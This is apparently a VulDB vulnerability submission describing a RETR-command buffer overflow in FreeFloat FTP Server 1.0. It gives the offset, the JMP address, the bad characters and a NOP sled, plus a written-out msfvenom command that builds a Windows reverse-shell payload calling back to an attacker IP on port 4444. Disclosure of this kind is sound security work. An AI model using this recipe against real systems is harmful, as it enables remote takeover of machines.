| tiêu đề | FreeFloat FTP Server 1.0 Buffer Overflow |
|---|
| Mô tả | This vulnerability is found in the `RETR` command of Freefloat FTP Server 1.0.
The `RETR` command is typically used to download a file from the server.
However, when we send a `RETR` request containing 246 bytes of offset data, we overwrite the EIP (Extended Instruction Pointer).
Once the 4 bytes of the EIP are reached, we overwrite it with a JMP instruction located at address `\x74\xe3\x2f\xd9`.
After identifying a suitable JMP address, we determined the list of bad characters to be `\x00`, `\x0a`, and `\x0d`. These characters needed to be excluded from the shellcode to avoid corrupting the payload.
With the buffer structure defined, we appended a shellcode generated using Metasploit’s msfvenom tool, with the following command:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.176.136 LPORT=4444 EXITFUNC=thread -b '\x00\x0a\x0d' -a x86 --platform Windows -f perl
Note: We included a NOP sled consisting of 20 bytes of `0x90` (NOP instructions) before the shellcode to ensure proper alignment and stability during execution.
NOPs (No Operation instructions) act as a buffer zone, increasing the chances that the execution flow safely reaches the shellcode. This is a common technique in buffer overflow exploits.
In order for the reverse shell to work, Netcat must be running in listening mode on port 4444.
Once the exploit is successfully executed, the shellcode initiates a reverse connection, granting remote access to the vulnerable machine.
The exploit was tested in an environment running.
A version of this exploit written in Perl is available at the following GitHub address: |
|---|
| Nguồn | ⚠️ https://github.com/r3ng4f/FreeFloat_1/blob/main/01-exploit.txt |
|---|
| Người dùng | r3ng4f (UID 73285) |
|---|
| Đệ trình | 27/05/2025 14:47 (cách đây 1 Năm) |
|---|
| Kiểm duyệt | 29/05/2025 12:02 (2 days later) |
|---|
| Trạng thái | được chấp nhận |
|---|
| Mục VulDB | 310503 [FreeFloat FTP Server 1.0 RETR Command tràn bộ đệm] |
|---|
| điểm | 20 |
|---|